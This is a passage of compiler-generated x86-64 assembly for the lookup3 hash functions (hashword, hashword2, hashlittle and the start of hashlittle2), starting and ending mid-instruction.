-8[rbp] rol eax, 16 sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 4 sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] rol eax, 14 sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] ror eax, 8 sub DWORD PTR -4[rbp], eax .L10: nop .L5: mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size hashword, .-hashword .globl hashword2 .type hashword2, @function hashword2: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov QWORD PTR -48[rbp], rcx mov rax, QWORD PTR -32[rbp] lea edx, 0[0+rax*4] mov rax, QWORD PTR -40[rbp] mov eax, DWORD PTR [rax] add eax, edx sub eax, 559038737 mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] mov DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] mov DWORD PTR -12[rbp], eax mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -4[rbp], eax jmp .L12 .L13: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -12[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -8[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 4 xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] rol eax, 6 xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 8 xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] add DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 16 xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] ror eax, 13 xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -4[rbp] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 4 xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -12[rbp] add DWORD PTR -8[rbp], eax sub QWORD PTR -32[rbp], 3 add QWORD PTR -24[rbp], 12 .L12: cmp QWORD PTR -32[rbp], 3 ja .L13 cmp QWORD PTR -32[rbp], 3 je .L14 cmp QWORD PTR -32[rbp], 3 ja .L15 cmp QWORD PTR -32[rbp], 2 je .L16 cmp QWORD PTR -32[rbp], 2 ja .L15 cmp QWORD PTR -32[rbp], 0 je .L19 cmp QWORD PTR -32[rbp], 1 je .L18 jmp .L15 .L14: mov rax, QWORD PTR -24[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -4[rbp], eax .L16: mov rax, QWORD PTR -24[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -8[rbp], eax .L18: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -12[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 14 sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 11 sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] ror eax, 7 sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] rol eax, 16 sub DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] xor DWORD PTR -12[rbp], eax mov eax, DWORD PTR -4[rbp] rol eax, 4 sub DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] xor DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] rol eax, 14 sub DWORD PTR -8[rbp], eax mov eax, DWORD PTR -8[rbp] xor DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] ror eax, 8 sub DWORD PTR -4[rbp], eax .L19: nop .L15: mov rax, QWORD PTR -40[rbp] mov edx, DWORD PTR -4[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -48[rbp] mov edx, DWORD PTR -8[rbp] mov DWORD PTR [rax], edx nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size hashword2, .-hashword2 .globl hashlittle .type hashlittle, @function hashlittle: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -72[rbp], rdi mov QWORD PTR -80[rbp], rsi mov DWORD PTR -84[rbp], edx mov rax, QWORD PTR -80[rbp] mov edx, eax mov eax, DWORD PTR -84[rbp] add eax, edx sub eax, 559038737 mov DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] mov DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] mov DWORD PTR -52[rbp], eax mov rax, QWORD PTR -72[rbp] mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -40[rbp] and eax, 3 test rax, rax jne .L21 mov rax, QWORD PTR -72[rbp] mov QWORD PTR -32[rbp], rax jmp .L22 .L23: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -32[rbp], 12 .L22: cmp QWORD PTR -80[rbp], 12 ja .L23 cmp QWORD PTR -80[rbp], 12 ja .L40 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L26[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L26[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L26: .long .L38-.L26 .long .L37-.L26 .long .L36-.L26 .long .L35-.L26 .long .L34-.L26 .long .L33-.L26 .long .L32-.L26 .long .L31-.L26 .long .L30-.L26 .long .L29-.L26 .long .L28-.L26 .long .L27-.L26 .long .L25-.L26 .text .L25: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L27: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L28: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L29: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L30: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L31: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L32: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L33: mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L34: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L40 .L35: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] and eax, 16777215 add DWORD PTR -52[rbp], eax jmp .L40 .L36: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] movzx eax, ax add DWORD PTR -52[rbp], eax jmp .L40 .L37: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L40 .L38: mov eax, DWORD PTR -44[rbp] jmp .L75 .L21: mov rax, QWORD PTR -40[rbp] and eax, 1 test rax, rax jne .L41 mov rax, QWORD PTR -72[rbp] mov QWORD PTR -24[rbp], rax jmp .L42 .L43: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 10 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -24[rbp], 12 .L42: cmp QWORD PTR -80[rbp], 12 ja .L43 mov rax, QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rax cmp QWORD PTR -80[rbp], 12 ja .L40 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L46[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L46[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L46: .long .L58-.L46 .long .L57-.L46 .long .L56-.L46 .long .L55-.L46 .long .L54-.L46 .long .L53-.L46 .long .L52-.L46 .long .L51-.L46 .long .L50-.L46 .long .L49-.L46 .long .L48-.L46 .long .L47-.L46 .long .L45-.L46 .text .L45: mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 10 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L40 .L47: mov rax, QWORD PTR -8[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax .L48: mov rax, QWORD PTR -24[rbp] add rax, 8 movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L40 .L49: mov rax, QWORD PTR -8[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax .L50: mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 6 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L40 .L51: mov rax, QWORD PTR -8[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax .L52: mov rax, QWORD PTR -24[rbp] add rax, 4 movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L40 .L53: mov rax, QWORD PTR -8[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax .L54: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -24[rbp] add rax, 2 movzx eax, WORD PTR [rax] movzx eax, ax sal eax, 16 add eax, edx add DWORD PTR -52[rbp], eax jmp .L40 .L55: mov rax, QWORD PTR -8[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax .L56: mov rax, QWORD PTR -24[rbp] movzx eax, WORD PTR [rax] movzx eax, ax add DWORD PTR -52[rbp], eax jmp .L40 .L57: mov rax, QWORD PTR -8[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L40 .L58: mov eax, DWORD PTR -44[rbp] jmp .L75 .L41: mov rax, QWORD PTR -72[rbp] mov QWORD PTR -16[rbp], rax jmp .L59 .L60: mov rax, QWORD PTR -16[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -16[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -16[rbp], 12 .L59: cmp QWORD PTR -80[rbp], 12 ja .L60 cmp QWORD PTR -80[rbp], 12 ja .L40 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L62[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L62[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L62: .long .L74-.L62 .long .L73-.L62 .long .L72-.L62 .long .L71-.L62 .long .L70-.L62 .long .L69-.L62 .long .L68-.L62 .long .L67-.L62 .long .L66-.L62 .long .L65-.L62 .long .L64-.L62 .long .L63-.L62 .long .L61-.L62 .text .L61: mov rax, QWORD PTR -16[rbp] add rax, 11 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -44[rbp], eax .L63: mov rax, QWORD PTR -16[rbp] add rax, 10 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -44[rbp], eax .L64: mov rax, QWORD PTR -16[rbp] add rax, 9 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -44[rbp], eax .L65: mov rax, QWORD PTR -16[rbp] add rax, 8 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -44[rbp], eax .L66: mov rax, QWORD PTR -16[rbp] add rax, 7 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -48[rbp], eax .L67: mov rax, QWORD PTR -16[rbp] add rax, 6 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -48[rbp], eax .L68: mov rax, QWORD PTR -16[rbp] add rax, 5 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -48[rbp], eax .L69: mov rax, QWORD PTR -16[rbp] add rax, 4 movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -48[rbp], eax .L70: mov rax, QWORD PTR -16[rbp] add rax, 3 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 24 add DWORD PTR -52[rbp], eax .L71: mov rax, QWORD PTR -16[rbp] add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 16 add DWORD PTR -52[rbp], eax .L72: mov rax, QWORD PTR -16[rbp] add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al sal eax, 8 add DWORD PTR -52[rbp], eax .L73: mov rax, QWORD PTR -16[rbp] movzx eax, BYTE PTR [rax] movzx eax, al add DWORD PTR -52[rbp], eax jmp .L40 .L74: mov eax, DWORD PTR -44[rbp] jmp .L75 .L40: mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 14 sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 11 sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -52[rbp] xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 7 sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 16 sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -52[rbp] xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 14 sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] ror eax, 8 sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] .L75: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size hashlittle, .-hashlittle .globl hashlittle2 .type hashlittle2, @function hashlittle2: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -72[rbp], rdi mov QWORD PTR -80[rbp], rsi mov QWORD PTR -88[rbp], rdx mov QWORD PTR -96[rbp], rcx mov rax, QWORD PTR -80[rbp] mov edx, eax mov rax, QWORD PTR -88[rbp] mov eax, DWORD PTR [rax] add eax, edx sub eax, 559038737 mov DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] mov DWORD PTR -48[rbp], eax mov eax, DWORD PTR -48[rbp] mov DWORD PTR -52[rbp], eax mov rax, QWORD PTR -96[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -72[rbp] mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -40[rbp] and eax, 3 test rax, rax jne .L77 mov rax, QWORD PTR -72[rbp] mov QWORD PTR -32[rbp], rax jmp .L78 .L79: mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 4 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] rol eax, 6 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 8 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] sub DWORD PTR -52[rbp], eax mov eax, DWORD PTR -44[rbp] rol eax, 16 xor DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] add DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] sub DWORD PTR -48[rbp], eax mov eax, DWORD PTR -52[rbp] ror eax, 13 xor DWORD PTR -48[rbp], eax mov eax, DWORD PTR -44[rbp] add DWORD PTR -52[rbp], eax mov eax, DWORD PTR -48[rbp] sub DWORD PTR -44[rbp], eax mov eax, DWORD PTR -48[rbp] rol eax, 4 xor DWORD PTR -44[rbp], eax mov eax, DWORD PTR -52[rbp] add DWORD PTR -48[rbp], eax sub QWORD PTR -80[rbp], 12 add QWORD PTR -32[rbp], 12 .L78: cmp QWORD PTR -80[rbp], 12 ja .L79 cmp QWORD PTR -80[rbp], 12 ja .L96 mov rax, QWORD PTR -80[rbp] lea rdx, 0[0+rax*4] lea rax, .L82[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L82[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L82: .long .L94-.L82 .long .L93-.L82 .long .L92-.L82 .long .L91-.L82 .long .L90-.L82 .long .L89-.L82 .long .L88-.L82 .long .L87-.L82 .long .L86-.L82 .long .L85-.L82 .long .L84-.L82 .long .L83-.L82 .long .L81-.L82 .text .L81: mov rax, QWORD PTR -32[rbp] add rax, 8 mov eax, DWORD PTR [rax] add DWORD PTR -44[rbp], eax mov rax, QWORD PTR -32[rbp] add rax, 4 mov eax, DWORD PTR [rax] add DWORD PTR -48[rbp], eax mov rax, QWORD PTR -32[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -52[rbp], eax jmp .L96 .L83: mov rax, QWORD PTR -32[rbp] add 